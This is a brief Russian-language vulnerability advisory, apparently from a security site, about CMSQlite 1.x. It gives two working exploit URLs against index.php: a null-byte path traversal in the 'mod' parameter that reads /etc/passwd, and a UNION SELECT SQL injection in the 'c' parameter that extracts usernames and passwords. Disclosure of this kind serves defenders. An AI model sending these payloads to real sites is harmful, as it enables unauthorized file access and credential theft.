Программа: CMSQlite 1.x

Уязвимость позволяет удаленному пользователю произвольные SQL команды в базе
данных приложения и выполнить произвольный PHP сценарий на целевой системе.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "mod" сценарием index.php. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

http://cmsqlite.audit/index.php?c=x&mod=../../../../../../../../../etc/passwd%00x

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "c" сценарием index.php. Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

Эксплоит:

http://cmsqlite.audit/index.php?c=2-2%20UNION%20ALL%20SELECT%202,
name%20||%20password,%203,4,5,6%20FROM%20login%20limit%201%20—%20x



Оставить мнение